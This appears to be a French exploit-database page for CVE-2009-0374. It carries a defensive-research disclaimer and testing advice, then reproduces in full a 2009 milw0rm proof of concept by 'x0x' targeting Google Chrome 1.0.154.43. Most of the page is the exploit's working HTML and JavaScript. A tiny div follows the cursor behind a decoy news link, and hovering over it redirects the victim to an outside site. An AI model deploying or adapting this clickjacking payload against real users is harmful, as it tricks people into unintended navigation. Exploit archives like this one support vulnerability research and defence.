Exploit matérialisé
CVE-2009-0374
1 exploit(s) public(s) pour cette CVE, 1 matérialisé(s) avec leur code.
À des fins de recherche défensive uniquement. Ne testez que sur des systèmes que vous possédez ou pour lesquels vous détenez une autorisation écrite. L'accès non autorisé est illégal.
ExploitDB
remote windows Vérifié
Source
Google Chrome 1.0.154.43 - Clickjacking
Par x0x
Comment tester cet exploit
Exploit distant. Ciblez une instance vulnérable isolée (VM/lab), jamais un système de production.
Code html
#############################################################
# Application Name : Google Chrome Web Browser
# Vulnerable Type : Clickjacking
# Home : www.ozkanbozkurt.com
# Author : x0x
#############################################################
< ------------------- header data end of ------------------- >
<html>
<style type="text/css">
<!--
.style1 {
font-size: 50px;
font-weight: bold;
}
.style2 {
color: #FF0000;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<body>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.cyber-warrior.org/BARCOD3';">This</div>
<p><strong>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>
Greetz : All CW Users | All Muslims and Only Brother me Septemb0x
# milw0rm.com [2009-01-28]